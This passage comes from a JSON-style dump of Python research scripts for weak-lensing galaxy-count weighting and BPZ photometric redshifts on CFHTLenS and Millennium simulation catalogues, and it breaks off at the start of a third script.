zoverr_lens_tab[i][j] * 1.0 / tab_field_zoverr[i][j]\n tab_q_massoverr[i][j] = massoverr_lens_tab[i][j] * 1.0 / tab_field_massoverr[i][j]\n tab_q_mass2overr[i][j] = mass2overr_lens_tab[i][j] * 1.0 / tab_field_mass2overr[i][j]\n tab_q_mass3overr[i][j] = mass3overr_lens_tab[i][j] * 1.0 / tab_field_mass3overr[i][j]\n tab_q_zmassoverr[i][j] = zmassoverr_lens_tab[i][j] * 1.0 / tab_field_zmassoverr[i][j]\n tab_q_zmass2overr[i][j] = zmass2overr_lens_tab[i][j] * 1.0 / tab_field_zmass2overr[i][j]\n tab_q_mass2rms[i][j] = mass2rms_lens_tab[i][j] * 1.0 / tab_field_mass2rms[i][j]\n tab_q_mass3rms[i][j] = mass3rms_lens_tab[i][j] * 1.0 / tab_field_mass3rms[i][j]\n tab_q_mass2overrrms[i][j] = mass2overrrms_lens_tab[i][j] * 1.0 / tab_field_mass2overrrms[i][j]\n tab_q_mass3overrrms[i][j] = mass3overrrms_lens_tab[i][j] * 1.0 / tab_field_mass3overrrms[i][j]\n\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n print (\"No. 
of fields with area without mask > 75 percent & > 50 percent: %d/%d, %d/%d\" % ((maskedcell>=0.75).sum(), cells_on_a_side ** 2, (maskedcell>=0.50).sum(), cells_on_a_side ** 2))\n\n# write a file where the most probable value of z and Mstar has been used, and a file for each of the 100 or 1000 samples\n address=\"/Volumes/G-RAIDStudio/CFHTlens/forhistograms\"\n f = open('%s/%s_%s_q50_orig_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"samp\":\n g = open('%s/%s_%s_q50_samp_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"tab\":\n h = open('%s/%s_%s_q50_tab_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n if maskedcell[i][j] >= 0.50:\n f.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (origq_gal[i][j], origq_oneoverr[i][j], origq_zweight[i][j], origq_mass[i][j], origq_mass2[i][j], origq_mass2rms[i][j], origq_mass3[i][j], origq_mass3rms[i][j], origq_zoverr[i][j], origq_massoverr[i][j], origq_mass2overr[i][j], origq_mass3overr[i][j], origq_mass2overrrms[i][j], origq_mass3overrrms[i][j], origq_zmassoverr[i][j], origq_zmass2overr[i][j]))\n for k in range(int(str(sys.argv[4]))):\n g.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (q_gal[i][j][k], q_oneoverr[i][j][k], q_zweight[i][j][k], q_mass[i][j][k], q_mass2[i][j][k], q_mass2rms[i][j][k], q_mass3[i][j][k], q_mass3rms[i][j][k], q_zoverr[i][j][k], q_massoverr[i][j][k], q_mass2overr[i][j][k], q_mass3overr[i][j][k], q_mass2overrrms[i][j][k], q_mass3overrrms[i][j][k], q_zmassoverr[i][j][k], q_zmass2overr[i][j][k]))\n for k in range(int(str(sys.argv[4]))):\n h.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (tab_q_gal[i][j][k], tab_q_oneoverr[i][j][k], tab_q_zweight[i][j][k], tab_q_mass[i][j][k], tab_q_mass2[i][j][k], tab_q_mass2rms[i][j][k], tab_q_mass3[i][j][k], tab_q_mass3rms[i][j][k], tab_q_zoverr[i][j][k], tab_q_massoverr[i][j][k], tab_q_mass2overr[i][j][k], tab_q_mass3overr[i][j][k], tab_q_mass2overrrms[i][j][k], tab_q_mass3overrrms[i][j][k], tab_q_zmassoverr[i][j][k], tab_q_zmass2overr[i][j][k]))\n f.close()\n #if str(sys.argv[8]) == \"samp\":\n g.close()\n #if str(sys.argv[8]) == \"tab\":\n h.close()\n\n f = open('%s/%s_%s_q75_orig_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"samp\":\n g = open('%s/%s_%s_q75_samp_size%s_i%s_%s.lst' % 
(address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"tab\":\n h = open('%s/%s_%s_q75_tab_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n if maskedcell[i][j] >= 0.75:\n f.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (origq_gal[i][j], origq_oneoverr[i][j], origq_zweight[i][j], origq_mass[i][j], origq_mass2[i][j], origq_mass2rms[i][j], origq_mass3[i][j], origq_mass3rms[i][j], origq_zoverr[i][j], origq_massoverr[i][j], origq_mass2overr[i][j], origq_mass3overr[i][j], origq_mass2overrrms[i][j], origq_mass3overrrms[i][j], origq_zmassoverr[i][j], origq_zmass2overr[i][j]))\n for k in range(int(str(sys.argv[4]))):\n g.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (q_gal[i][j][k], q_oneoverr[i][j][k], q_zweight[i][j][k], q_mass[i][j][k], q_mass2[i][j][k], q_mass2rms[i][j][k], q_mass3[i][j][k], q_mass3rms[i][j][k], q_zoverr[i][j][k], q_massoverr[i][j][k], q_mass2overr[i][j][k], q_mass3overr[i][j][k], q_mass2overrrms[i][j][k], q_mass3overrrms[i][j][k], q_zmassoverr[i][j][k], q_zmass2overr[i][j][k]))\n for k in range(int(str(sys.argv[4]))):\n h.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (tab_q_gal[i][j][k], tab_q_oneoverr[i][j][k], tab_q_zweight[i][j][k], tab_q_mass[i][j][k], tab_q_mass2[i][j][k], tab_q_mass2rms[i][j][k], tab_q_mass3[i][j][k], tab_q_mass3rms[i][j][k], tab_q_zoverr[i][j][k], tab_q_massoverr[i][j][k], tab_q_mass2overr[i][j][k], tab_q_mass3overr[i][j][k], tab_q_mass2overrrms[i][j][k], tab_q_mass3overrrms[i][j][k], tab_q_zmassoverr[i][j][k], tab_q_zmass2overr[i][j][k]))\n\n f.close()\n #mstarcat_lens.close()\n #if str(sys.argv[8]) == \"samp\":\n g.close()\n #if str(sys.argv[8]) == \"tab\":\n h.close()\n\n print(\"Total time for subfield: --- %s seconds ---\" % (time.time() - start_timesubfield))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.4762692451477051, "alphanum_fraction": 0.5246829986572266, "avg_line_length": 57.5102653503418, "blob_id": "49655c8028c09a66a97d3e156dbfd1bb7cb37689", "content_id": "2219a592fd044048bc4d3adf07658a469fcf3bb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19953, "license_type": "no_license", "max_line_length": 563, "num_lines": 341, "path": "/python/catalogue_utilities/OLDphotozMillenium.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# run from the bpz/test folder as: python 
/Users/perseus/Dropbox/Davis_work/code/photozMillenium.py #complete address to the simulation field number\n# where the address is, e.g. /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_6_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.images.txt, and number is an integer, corresponding to the order number of each run of this code. Run the code from inside bpz/test\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_timefield = time.time()\n\nbpznr=1000 # how many objects should bpz be run with\nu_millenium=np.zeros(bpznr)\nuerr_millenium=np.zeros(bpznr)\ng_millenium=np.zeros(bpznr)\ngerr_millenium=np.zeros(bpznr)\nr_millenium=np.zeros(bpznr)\nrerr_millenium=np.zeros(bpznr)\ni_millenium=np.zeros(bpznr)\nierr_millenium=np.zeros(bpznr)\nz_millenium=np.zeros(bpznr)\nzerr_millenium=np.zeros(bpznr)\nJ_millenium=np.zeros(bpznr)\nJerr_millenium=np.zeros(bpznr)\nH_millenium=np.zeros(bpznr)\nHerr_millenium=np.zeros(bpznr)\nK_millenium=np.zeros(bpznr)\nKerr_millenium=np.zeros(bpznr)\nid=np.zeros(bpznr)\npofz=np.zeros((bpznr,70))\nmstar=np.zeros(bpznr)\nposx=np.zeros(bpznr)\nposy=np.zeros(bpznr)\nz_best=np.zeros(bpznr)\nz_spec=np.zeros(bpznr)\n#z=np.linspace(0.05,3.5,70)\nos.system(\"cp millenium.columns millenium_%s.columns\" % str(sys.argv[2]))\nname_in=\"/Users/perseus/bpz-1.99.3/test/millenium_%s.cat\" % str(sys.argv[2])\nname_outzbest=\"/Users/perseus/bpz-1.99.3/test/millenium_%s_bpz.cat\" % str(sys.argv[2])\nname_outpdz=\"/Users/perseus/bpz-1.99.3/test/millenium_%s.probs\" % str(sys.argv[2])\nname_out=\"%s.pdz\" % (str(sys.argv[1])[0:len(str(sys.argv[1]))-11])\nos.system(\"rm %s\" % name_out) # since the code only appends, if we have an incomplete previous output we should remove it\nitrue=0 # index of only the objects passing the selection criteria, between 0 and bpznr-1\nwith open(str(sys.argv[1])) as fields:\n for gal in fields:\n if gal!=\"\\n\": # careful to include this, otherwise the objects at the end of file fail to be included\n if gal.split()[0]!=\"GalID\":\n if itrue==bpznr:\n itrue=0\n bpz_in = open(name_in,'w')\n bpz_in.write(\"#ID u u_err g g_err r r_err i i_err z z_err J J_err H H_err K K_err \\n\")\n for i in range(bpznr):\n bpz_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\\n' % (i+1,u_millenium[i],uerr_millenium[i],g_millenium[i],gerr_millenium[i],r_millenium[i],rerr_millenium[i],i_millenium[i],ierr_millenium[i],z_millenium[i],zerr_millenium[i],J_millenium[i],Jerr_millenium[i],H_millenium[i],Herr_millenium[i],K_millenium[i],Kerr_millenium[i]))\n bpz_in.close()\n os.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % name_in)\n os.system(\"python $BPZPATH/bpzfinalize.py %s\" % name_in[0:len(name_in)-4])\n l=0\n with open('%s' % name_outzbest) as bpz_outzbest:\n for outzbest in bpz_outzbest:\n if (outzbest.split()[0]!=\"#\") and (outzbest.split()[0]!=\"#id\"):\n #print outzbest.split()[0], \"\\n\"\n z_best[l]=outzbest.split()[1]\n l=l+1\n l=0\n with open('%s' % name_outpdz) as bpz_outpdz:\n for outpdz in bpz_outpdz:\n if outpdz.split()[0]!=\"#\":\n for i in range(70):\n pofz[l][i]=float(outpdz.split()[1+i])\n l=l+1\n outfile=open(name_out,'a')\n output=\"\"\n for i in range(bpznr):\n strid=\"%15d\" % id[i]\n 
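# Added note: each row written below is tab-separated as ID (padded to 15 digits), Mstar,\n                        # z_spec, z_best from bpz, posx, posy, the eight magnitude/error pairs (u g r i z J H K),\n                        # and finally the 70 tabulated P(z) values on the z = 0.05-3.5 grid defined above.\n                        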
output=output+strid+\"\\t\"+str(mstar[i])+\"\\t\"+str(z_spec[i])+\"\\t\"+str(z_best[i])+\"\\t\"+str(posx[i])+\"\\t\"+str(posy[i])+\"\\t\"+str(u_millenium[i])+\"\\t\"+str(uerr_millenium[i])+\"\\t\"+str(g_millenium[i])+\"\\t\"+str(gerr_millenium[i])+\"\\t\"+str(r_millenium[i])+\"\\t\"+str(rerr_millenium[i])+\"\\t\"+str(i_millenium[i])+\"\\t\"+str(ierr_millenium[i])+\"\\t\"+str(z_millenium[i])+\"\\t\"+str(zerr_millenium[i])+\"\\t\"+str(J_millenium[i])+\"\\t\"+str(Jerr_millenium[i])+\"\\t\"+str(H_millenium[i])+\"\\t\"+str(Herr_millenium[i])+\"\\t\"+str(K_millenium[i])+\"\\t\"+str(Kerr_millenium[i])+\"\\t\"\n for j in range(70):\n output=output+str(pofz[i][j])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n #print gal.split()[15], \"\\n\"\n if float(gal.split()[15]) <= 24: # if mag_i < 24\n id[itrue]=float(gal.split()[0])\n mstar[itrue]=float(gal.split()[11])\n z_spec[itrue]=float(gal.split()[5])\n posx[itrue]=float(gal.split()[6])\n posy[itrue]=float(gal.split()[7])\n u_millenium[itrue]=float(gal.split()[12])\n if u_millenium[itrue] < 23:\n uerr_millenium[itrue]=0.01\n if (u_millenium[itrue] < 24) and (u_millenium[itrue] > 23):\n uerr_millenium[itrue]=0.02\n if (u_millenium[itrue] < 24.5) and (u_millenium[itrue] > 24):\n uerr_millenium[itrue]=0.03\n if (u_millenium[itrue] < 24.7) and (u_millenium[itrue] > 24.5):\n uerr_millenium[itrue]=0.04\n if (u_millenium[itrue] < 24.9) and (u_millenium[itrue] > 24.7):\n uerr_millenium[itrue]=0.05\n if (u_millenium[itrue] < 25.1) and (u_millenium[itrue] > 24.9):\n uerr_millenium[itrue]=0.06\n if (u_millenium[itrue] < 25.2) and (u_millenium[itrue] > 25.1):\n uerr_millenium[itrue]=0.07\n if (u_millenium[itrue] < 25.3) and (u_millenium[itrue] > 25.2):\n uerr_millenium[itrue]=0.08\n if (u_millenium[itrue] < 25.4) and (u_millenium[itrue] > 25.3):\n uerr_millenium[itrue]=0.09\n if (u_millenium[itrue] < 25.5) and (u_millenium[itrue] > 25.4):\n uerr_millenium[itrue]=0.10\n if (u_millenium[itrue] < 26) and (u_millenium[itrue] > 25.5):\n uerr_millenium[itrue]=0.13\n if (u_millenium[itrue] < 26.5) and (u_millenium[itrue] > 26):\n uerr_millenium[itrue]=0.18\n if (u_millenium[itrue] < 27) and (u_millenium[itrue] > 26.5):\n uerr_millenium[itrue]=0.25\n if u_millenium[itrue] > 24:\n uerr_millenium[itrue]=0.30\n g_millenium[itrue]=float(gal.split()[13])\n if g_millenium[itrue] < 24:\n gerr_millenium[itrue]=0.01\n if (g_millenium[itrue] < 24.5) and (g_millenium[itrue] > 24):\n gerr_millenium[itrue]=0.02\n if (g_millenium[itrue] < 24.8) and (g_millenium[itrue] > 24.5):\n gerr_millenium[itrue]=0.03\n if (g_millenium[itrue] < 25) and (g_millenium[itrue] > 24.8):\n gerr_millenium[itrue]=0.04\n if (g_millenium[itrue] < 25.3) and (g_millenium[itrue] > 25):\n gerr_millenium[itrue]=0.05\n if (g_millenium[itrue] < 25.5) and (g_millenium[itrue] > 25.3):\n gerr_millenium[itrue]=0.06\n if (g_millenium[itrue] < 25.7) and (g_millenium[itrue] > 25.5):\n gerr_millenium[itrue]=0.07\n if (g_millenium[itrue] < 25.8) and (g_millenium[itrue] > 25.7):\n gerr_millenium[itrue]=0.08\n if (g_millenium[itrue] < 26) and (g_millenium[itrue] > 25.8):\n gerr_millenium[itrue]=0.09\n if (g_millenium[itrue] < 26.2) and (g_millenium[itrue] > 26):\n gerr_millenium[itrue]=0.10\n if (g_millenium[itrue] < 26.5) and (g_millenium[itrue] > 26.2):\n gerr_millenium[itrue]=0.13\n if (g_millenium[itrue] < 27) and (g_millenium[itrue] > 26.5):\n gerr_millenium[itrue]=0.18\n if g_millenium[itrue] > 27:\n gerr_millenium[itrue]=0.18\n r_millenium[itrue]=float(gal.split()[14])\n if 
r_millenium[itrue] < 23.2:\n rerr_millenium[itrue]=0.01\n if (r_millenium[itrue] < 24.1) and (r_millenium[itrue] > 23.2):\n rerr_millenium[itrue]=0.02\n if (r_millenium[itrue] < 24.5) and (r_millenium[itrue] > 24.1):\n rerr_millenium[itrue]=0.03\n if (r_millenium[itrue] < 24.9) and (r_millenium[itrue] > 24.5):\n rerr_millenium[itrue]=0.04\n if (r_millenium[itrue] < 25.0) and (r_millenium[itrue] > 24.9):\n rerr_millenium[itrue]=0.05\n if (r_millenium[itrue] < 25.2) and (r_millenium[itrue] > 25.0):\n rerr_millenium[itrue]=0.06\n if (r_millenium[itrue] < 25.3) and (r_millenium[itrue] > 25.2):\n rerr_millenium[itrue]=0.07\n if (r_millenium[itrue] < 25.5) and (r_millenium[itrue] > 25.3):\n rerr_millenium[itrue]=0.08\n if (r_millenium[itrue] < 25.6) and (r_millenium[itrue] > 25.5):\n rerr_millenium[itrue]=0.09\n if (r_millenium[itrue] < 25.7) and (r_millenium[itrue] > 25.6):\n rerr_millenium[itrue]=0.10\n if (r_millenium[itrue] < 26.0) and (r_millenium[itrue] > 25.7):\n rerr_millenium[itrue]=0.12\n if r_millenium[itrue] > 26:\n rerr_millenium[itrue]=0.12\n i_millenium[itrue]=float(gal.split()[15])\n if i_millenium[itrue] < 22.8:\n ierr_millenium[itrue]=0.01\n if (i_millenium[itrue] < 23.6) and (i_millenium[itrue] > 22.8):\n ierr_millenium[itrue]=0.02\n if (i_millenium[itrue] < 24.0) and (i_millenium[itrue] > 23.6):\n ierr_millenium[itrue]=0.03\n if (i_millenium[itrue] < 24.2) and (i_millenium[itrue] > 24.0):\n ierr_millenium[itrue]=0.04\n if (i_millenium[itrue] < 24.4) and (i_millenium[itrue] > 24.2):\n ierr_millenium[itrue]=0.05\n if (i_millenium[itrue] < 24.6) and (i_millenium[itrue] > 24.4):\n ierr_millenium[itrue]=0.06\n if (i_millenium[itrue] < 24.7) and (i_millenium[itrue] > 24.6):\n ierr_millenium[itrue]=0.07\n if (i_millenium[itrue] < 24.8) and (i_millenium[itrue] > 24.7):\n ierr_millenium[itrue]=0.08\n if (i_millenium[itrue] < 24.9) and (i_millenium[itrue] > 24.8):\n ierr_millenium[itrue]=0.09\n if (i_millenium[itrue] < 25.0) and (i_millenium[itrue] > 24.9):\n ierr_millenium[itrue]=0.10\n if (i_millenium[itrue] < 25.2) and (i_millenium[itrue] > 25.0):\n ierr_millenium[itrue]=0.11\n if i_millenium[itrue] > 25.2:\n ierr_millenium[itrue]=0.11\n z_millenium[itrue]=float(gal.split()[16])\n if z_millenium[itrue] < 22.0:\n zerr_millenium[itrue]=0.01\n if (z_millenium[itrue] < 22.8) and (z_millenium[itrue] > 22.0):\n zerr_millenium[itrue]=0.02\n if (z_millenium[itrue] < 23.2) and (z_millenium[itrue] > 22.8):\n zerr_millenium[itrue]=0.03\n if (z_millenium[itrue] < 24.2) and (z_millenium[itrue] > 23.2):\n zerr_millenium[itrue]=0.04\n if (z_millenium[itrue] < 24.4) and (z_millenium[itrue] > 24.2):\n zerr_millenium[itrue]=0.05\n if (z_millenium[itrue] < 24.6) and (z_millenium[itrue] > 24.4):\n zerr_millenium[itrue]=0.06\n if (z_millenium[itrue] < 24.7) and (z_millenium[itrue] > 24.6):\n zerr_millenium[itrue]=0.07\n if (z_millenium[itrue] < 24.8) and (z_millenium[itrue] > 24.7):\n zerr_millenium[itrue]=0.08\n if (z_millenium[itrue] < 24.9) and (z_millenium[itrue] > 24.8):\n zerr_millenium[itrue]=0.09\n if (z_millenium[itrue] < 25.0) and (z_millenium[itrue] > 24.9):\n zerr_millenium[itrue]=0.10\n if (z_millenium[itrue] < 25.2) and (z_millenium[itrue] > 25.0):\n zerr_millenium[itrue]=0.11\n if z_millenium[itrue] > 25.2:\n zerr_millenium[itrue]=0.11\n J_millenium[itrue]=float(gal.split()[17])\n if J_millenium[itrue] < 20.5:\n Jerr_millenium[itrue]=0.01\n if (J_millenium[itrue] < 21.2) and (J_millenium[itrue] > 20.5):\n Jerr_millenium[itrue]=0.02\n if (J_millenium[itrue] < 22.0) and (J_millenium[itrue] 
> 21.2):\n Jerr_millenium[itrue]=0.03\n if (J_millenium[itrue] < 22.4) and (J_millenium[itrue] > 22.0):\n Jerr_millenium[itrue]=0.04\n if (J_millenium[itrue] < 22.6) and (J_millenium[itrue] > 22.4):\n Jerr_millenium[itrue]=0.05\n if (J_millenium[itrue] < 22.8) and (J_millenium[itrue] > 22.6):\n Jerr_millenium[itrue]=0.06\n if (J_millenium[itrue] < 22.9) and (J_millenium[itrue] > 22.8):\n Jerr_millenium[itrue]=0.07\n if (J_millenium[itrue] < 23.1) and (J_millenium[itrue] > 22.9):\n Jerr_millenium[itrue]=0.08\n if (J_millenium[itrue] < 23.2) and (J_millenium[itrue] > 23.1):\n Jerr_millenium[itrue]=0.09\n if (J_millenium[itrue] < 23.4) and (J_millenium[itrue] > 23.2):\n Jerr_millenium[itrue]=0.10\n if (J_millenium[itrue] < 23.7) and (J_millenium[itrue] > 23.4):\n Jerr_millenium[itrue]=0.15\n if (J_millenium[itrue] < 24.0) and (J_millenium[itrue] > 23.7):\n Jerr_millenium[itrue]=0.18\n if J_millenium[itrue] > 24.0:\n Jerr_millenium[itrue]=0.18\n H_millenium[itrue]=float(gal.split()[18]) # I don't have H data yet so I use an average between J and K\n if H_millenium[itrue] < 21.9:\n Herr_millenium[itrue]=0.01\n if (H_millenium[itrue] < 22.6) and (H_millenium[itrue] > 21.9):\n Herr_millenium[itrue]=0.02\n if (H_millenium[itrue] < 22.9) and (H_millenium[itrue] > 22.6):\n Herr_millenium[itrue]=0.03\n if (H_millenium[itrue] < 23.1) and (H_millenium[itrue] > 22.9):\n Herr_millenium[itrue]=0.04\n if (H_millenium[itrue] < 23.3) and (H_millenium[itrue] > 23.1):\n Herr_millenium[itrue]=0.05\n if (H_millenium[itrue] < 23.4) and (H_millenium[itrue] > 23.3):\n Herr_millenium[itrue]=0.06\n if (H_millenium[itrue] < 23.6) and (H_millenium[itrue] > 23.4):\n Herr_millenium[itrue]=0.07\n if (H_millenium[itrue] < 23.8) and (H_millenium[itrue] > 23.6):\n Herr_millenium[itrue]=0.08\n if (H_millenium[itrue] < 24.0) and (H_millenium[itrue] > 23.8):\n Herr_millenium[itrue]=0.09\n if (H_millenium[itrue] < 24.1) and (H_millenium[itrue] > 24.0):\n Herr_millenium[itrue]=0.10\n if (H_millenium[itrue] < 24.5) and (H_millenium[itrue] > 24.1):\n Herr_millenium[itrue]=0.15\n if H_millenium[itrue] > 24.5:\n Herr_millenium[itrue]=0.15\n K_millenium[itrue]=float(gal.split()[19])\n if K_millenium[itrue] < 22.0:\n Kerr_millenium[itrue]=0.01\n if (K_millenium[itrue] < 22.8) and (K_millenium[itrue] > 22.0):\n Kerr_millenium[itrue]=0.02\n if (K_millenium[itrue] < 23.3) and (K_millenium[itrue] > 22.8):\n Kerr_millenium[itrue]=0.03\n if (K_millenium[itrue] < 23.5) and (K_millenium[itrue] > 23.3):\n Kerr_millenium[itrue]=0.04\n if (K_millenium[itrue] < 23.7) and (K_millenium[itrue] > 23.5):\n Kerr_millenium[itrue]=0.05\n if (K_millenium[itrue] < 23.9) and (K_millenium[itrue] > 23.7):\n Kerr_millenium[itrue]=0.06\n if (K_millenium[itrue] < 24.2) and (K_millenium[itrue] > 23.9):\n Kerr_millenium[itrue]=0.07\n if (K_millenium[itrue] < 24.4) and (K_millenium[itrue] > 24.2):\n Kerr_millenium[itrue]=0.08\n if (K_millenium[itrue] < 24.5) and (K_millenium[itrue] > 24.4):\n Kerr_millenium[itrue]=0.09\n if (K_millenium[itrue] < 24.6) and (K_millenium[itrue] > 24.5):\n Kerr_millenium[itrue]=0.10\n if (K_millenium[itrue] < 25.0) and (K_millenium[itrue] > 24.6):\n Kerr_millenium[itrue]=0.15\n if K_millenium[itrue] > 25.0:\n Kerr_millenium[itrue]=0.15\n itrue=itrue+1\n\n #the code below is necessary to deal with the objects at the end of the file, if there are fewer than bpznr objects left\nbpz_in = open(name_in,'w')\nbpz_in.write(\"#ID u u_err g g_err r r_err i i_err z z_err J J_err H H_err K K_err \\n\")\nfor i in range(itrue):\n bpz_in.write('%s %s 
%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\\n' % (i+1,u_millenium[i],uerr_millenium[i],g_millenium[i],gerr_millenium[i],r_millenium[i],rerr_millenium[i],i_millenium[i],ierr_millenium[i],z_millenium[i],zerr_millenium[i],J_millenium[i],Jerr_millenium[i],H_millenium[i],Herr_millenium[i],K_millenium[i],Kerr_millenium[i]))\nbpz_in.close()\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % name_in)\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % name_in[0:len(name_in)-4])\nl=0\nwith open('%s' % name_outzbest) as bpz_outzbest:\n for outzbest in bpz_outzbest:\n if (outzbest.split()[0]!=\"#\") and (outzbest.split()[0]!=\"#id\"):\n z_best[l]=outzbest.split()[1]\n l=l+1\nl=0\nwith open('%s' % name_outpdz) as bpz_outpdz:\n for outpdz in bpz_outpdz:\n if outpdz.split()[0]!=\"#\":\n for i in range(70):\n pofz[l][i]=float(outpdz.split()[1+i])\n l=l+1\noutfile=open(name_out,'a')\noutput=\"\"\nfor i in range(itrue):\n output=output+str(id[i])+\"\\t\"+str(mstar[i])+\"\\t\"+str(z_spec[i])+\"\\t\"+str(z_best[i])+\"\\t\"+str(posx[i])+\"\\t\"+str(posy[i])+\"\\t\"+str(u_millenium[i])+\"\\t\"+str(uerr_millenium[i])+\"\\t\"+str(g_millenium[i])+\"\\t\"+str(gerr_millenium[i])+\"\\t\"+str(r_millenium[i])+\"\\t\"+str(rerr_millenium[i])+\"\\t\"+str(i_millenium[i])+\"\\t\"+str(ierr_millenium[i])+\"\\t\"+str(z_millenium[i])+\"\\t\"+str(zerr_millenium[i])+\"\\t\"+str(J_millenium[i])+\"\\t\"+str(Jerr_millenium[i])+\"\\t\"+str(H_millenium[i])+\"\\t\"+str(Herr_millenium[i])+\"\\t\"+str(K_millenium[i])+\"\\t\"+str(Kerr_millenium[i])+\"\\t\"\n for j in range(70):\n output=output+str(pofz[i][j])+\"\\t\"\n output=output+\"\\n\"\noutfile.write(output)\noutfile.close()\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.4910215139389038, "alphanum_fraction": 0.5797118544578552, "avg_line_length": 85.65897369384766, "blob_id": "1fe61ddaa607777a0b6c9b6ba48756b5c8a3ca84", "content_id": "149b949e23cd7f3223ef30db6ad3984c14d2017c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33803, "license_type": "no_license", "max_line_length": 936, "num_lines": 390, "path": "/python/weightingsims.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#B1608_sims Millenium\n# 25 subsims of 1degx1deg, to emulate CFHTLENS W4\n# cells: 4x4arcmin covering each subsim, in a grid\n# run as: python weightingsims.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_6_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs.cat samplesize# radius maglimit\n# where samplesize number is 0, 100 or 1000 and msk_lenssize is 45, 60, 90 or 120; maglimit is 23 23.5 or 24;\n#since the weights depend on z_s, I will not run 4 times but instead in the output file output for all 4 redshifts in different columns\n\nimport numpy as np\nimport scipy\nimport sys\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_time = time.time()\n\nprint(\"Arguments: Catalogue name: %s \\n Number of samples to be drawn from P(z) and P(Mstar): %s \\n Radius 